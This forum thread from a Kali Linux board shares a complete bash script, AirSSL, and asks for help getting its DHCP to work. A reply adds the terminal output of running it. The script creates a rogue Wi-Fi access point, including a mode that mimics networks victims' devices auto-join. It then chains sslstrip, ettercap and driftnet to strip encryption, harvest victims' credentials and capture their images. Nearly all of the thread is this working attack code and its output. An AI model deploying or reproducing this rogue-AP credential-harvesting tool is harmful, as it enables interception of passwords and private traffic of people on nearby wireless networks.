Results 1 to 2 of 2

Thread: AirSSL Modified for Kali

  1. #1
    Join Date
    2013-Oct
    Posts
    1

    AirSSL Modified for Kali

    Hey guys,

    I have most of it working. The problem is it will not dish out IP's to clients trying to connect via FakeAP

    1. The directory is /usr/share/wireless/airssl

    Anyway, On the code. Here is the script

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010, @jcaitf 2013
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    
    # Network questions
    echo
    echo "AIRSSL 2.0 - Credits killadaninja & G60Jon & @jcaitf "
    echo
    route -n -A inet | grep UG
    echo
    echo
    echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
    read gatewayip
    iwconfig
    echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
    read internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
    read fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read ESSID
    airmon-ng start $fakeap_interface
    fakeap=$fakeap_interface
    fakeap_interface="mon0"
    
    # Dhcpd creation
    mkdir -p "/usr/share/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "\"$ESSID\"";
    # option domain-name-servers 10.0.0.1;
    option domain-name-servers 8.8.8.8;
    
    range 10.0.0.20 10.0.0.50;
    
    }" > /usr/share/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches? "
    echo
    echo "Choose Y to see airbase-ng help and add switches. "
    echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
    echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
    echo "Y, N or A "
     
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    #chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/usr/share/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 3
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N "
    echo "Y or N "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), "
    echo "Y or N "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/usr/share/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /usr/share/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit
    And, Here is the dhcpd.conf

    Code:
    authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "Free WiFi";
    # option domain-name-servers 10.0.0.1;
    option domain-name-servers 8.8.8.8;
    
    range 10.0.0.20 10.0.0.50;
    
    }
    Any help would be great! Thanks in advance
    Last edited by satix; 2013-10-07 at 19:56.

  2. #2
    Join Date
    2013-Dec
    Posts
    3
    hello.... not working for me.. help... / after creating fake ap
    ap dont give internate acess to victim......!!!!!!!
    i configured chcp configuration as shown by u.

    here is procedure


    hello.... not working for me.. help... / after creating fake ap
    ap dont give internate acess to victim......!!!!!!!
    i configured chcp configuration as shown by u.

    here is procedure


    root@localhost:~# bash '/root/Desktop/airssl.sh'

    AIRSSL 2.0 - Credits killadaninja & G60Jon & @jcaitf

    0.0.0.0 10.6.6.6 0.0.0.0 UG 0 0 0 ppp0


    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    10.6.6.6
    ppp0 no wireless extensions.

    wlan0 IEEE 802.11bgn ESSID: off/any
    Mode:Ad-Hoc Frequency:2.412 GHz Cell: Not-Associated
    Tx-Power=16 dBm
    Retry long limit:7 RTS thr: off Fragment thr: off
    Encryption key: off
    Power Management: off

    usbpn0 no wireless extensions.

    lo no wireless extensions.

    eth0 no wireless extensions.

    Enter your interface that is connected to the internet, this should be listed above. For example eth1: ppp0
    Enter your interface to be used for the fake AP, for example wlan0: wlan0
    Enter the ESSID you would like your rogue AP to be called: hello


    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    2447 NetworkManager
    2551 wpa_supplicant


    Interface Chipset Driver

    wlan0 Atheros AR9565 ath9k - [phy0]
    (monitor mode enabled on mon0)

    [+] Configuring FakeAP....

    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches?

    Choose Y to see airbase-ng help and add switches.
    Choose N to run airbase-ng in basic mode with your choosen ESSID.
    Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
    Y, N or A
    y

    Airbase-ng 1.2 beta2 - (C) 2008-2013 Thomas d'Otreppe
    Original work: Martin Beck
    http://www.aircrack-ng.org

    usage: airbase-ng <options> <replay interface>

    Options:

    -a bssid : set Access Point MAC address
    -i iface : capture packets from this interface
    -w WEP key : use this WEP key to en-/decrypt packets
    -h MAC : source mac for MITM mode
    -f disallow : disallow specified client MACs (default: allow)
    -W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
    -q : quiet (do not print statistics)
    -v : verbose (print more messages)
    -A : Ad-Hoc Mode (allows other clients to peer)
    -Y in|out|both : external packet processing
    -c channel : sets the channel the AP is running on
    -X : hidden ESSID
    -s : force shared key authentication (default: auto)
    -S : set shared key challenge length (default: 128)
    -L : Caffe-Latte WEP attack (use if driver can't send frags)
    -N : cfrag WEP attack (recommended)
    -x nbpps : number of packets per second (default: 100)
    -y : disables responses to broadcast probes
    -0 : set all WPA,WEP,open tags. can't be used with -z & -Z
    -z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
    -Z type : same as -z, but for WPA2
    -V type : fake EAPOL 1=MD5 2=SHA1 3=auto
    -F prefix : write all sent and received frames into pcap file
    -P : respond to all probes, even when specifying ESSIDs
    -I interval : sets the beacon interval value in ms
    -C seconds : enables beaconing of probed ESSID values (requires -P)

    Filter options:
    --bssid MAC : BSSID to filter/use
    --bssids file : read a list of BSSIDs out of that file
    --client MAC : MAC of client to filter
    --clients file : read a list of MACs out of that file
    --essid ESSID : specify a single ESSID (default: default)
    --essids file : read a list of ESSIDs out of that file

    --help : Displays this usage screen


    Enter switches, note you have already chosen an ESSID -e this cannot be


    [+] Starting FakeAP...
    [+] Configuring forwarding tables...
    at0: ERROR while getting interface flags: No such device
    SIOCSIFADDR: No such device
    at0: ERROR while getting interface flags: No such device
    SIOCSIFNETMASK: No such device
    SIOCSIFMTU: No such device
    SIOCADDRT: Network is unreachable
    [+] Setting up DHCP...
    [+] Starting sslstrip...
    [+] Configuring ettercap...

    Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N
    Y or N
    n

    [+] Starting ettercap...

    [+] Driftnet?

    Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower),
    Y or N
    y
    [+] Starting driftnet...


    [+] Activated...
    Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata

    [+] IMPORTANT...
    After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR
    y

    [+] Cleaning up airssl and resetting iptables...
    /root/Desktop/airssl.sh: line 183: kill: (5811) - No such process
    /root/Desktop/airssl.sh: line 184: kill: (5870) - No such process
    /root/Desktop/airssl.sh: line 186: kill: (5895) - No such process


    Interface Chipset Driver

    wlan0 Atheros AR9565 ath9k - [phy0]
    mon0 Atheros AR9565 ath9k - [phy0] (removed)



    Interface Chipset Driver

    wlan0 Atheros AR9565 ath9k - [phy0]
    (monitor mode disabled)

    [+] Clean up successful...
    [+] Thank you for using airssl, Good Bye...
    root@localhost:~# bash '/root/Desktop/airssl.sh'

    AIRSSL 2.0 - Credits killadaninja & G60Jon & @jcaitf

    0.0.0.0 10.6.6.6 0.0.0.0 UG 0 0 0 ppp0


    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    10.6.6.6
    ppp0 no wireless extensions.

    wlan0 IEEE 802.11bgn ESSID: off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
    Retry long limit:7 RTS thr: off Fragment thr: off
    Encryption key: off
    Power Management: off

    usbpn0 no wireless extensions.

    lo no wireless extensions.

    eth0 no wireless extensions.

    Enter your interface that is connected to the internet, this should be listed above. For example eth1: ppp0
    Enter your interface to be used for the fake AP, for example wlan0: wlan0
    Enter the ESSID you would like your rogue AP to be called: hello


    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    2447 NetworkManager
    2551 wpa_supplicant


    Interface Chipset Driver

    wlan0 Atheros AR9565 ath9k - [phy0]
    (monitor mode enabled on mon0)

    [+] Configuring FakeAP....

    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches?

    Choose Y to see airbase-ng help and add switches.
    Choose N to run airbase-ng in basic mode with your choosen ESSID.
    Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
    Y, N or A
    n

    [+] Starting FakeAP...
    [+] Configuring forwarding tables...
    [+] Setting up DHCP...
    [+] Starting sslstrip...
    [+] Configuring ettercap...

    Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N
    Y or N
    n

    [+] Starting ettercap...

    [+] Driftnet?

    Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower),
    Y or N
    n


    [+] Activated...
    Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata

    [+] IMPORTANT...
    After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR



Similar Threads

  1. Bully modified to implement pixiewps attack
    By aanarchyy in forum Project Archive
    Replies: 65
    Last Post: 2017-04-17, 21:21

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •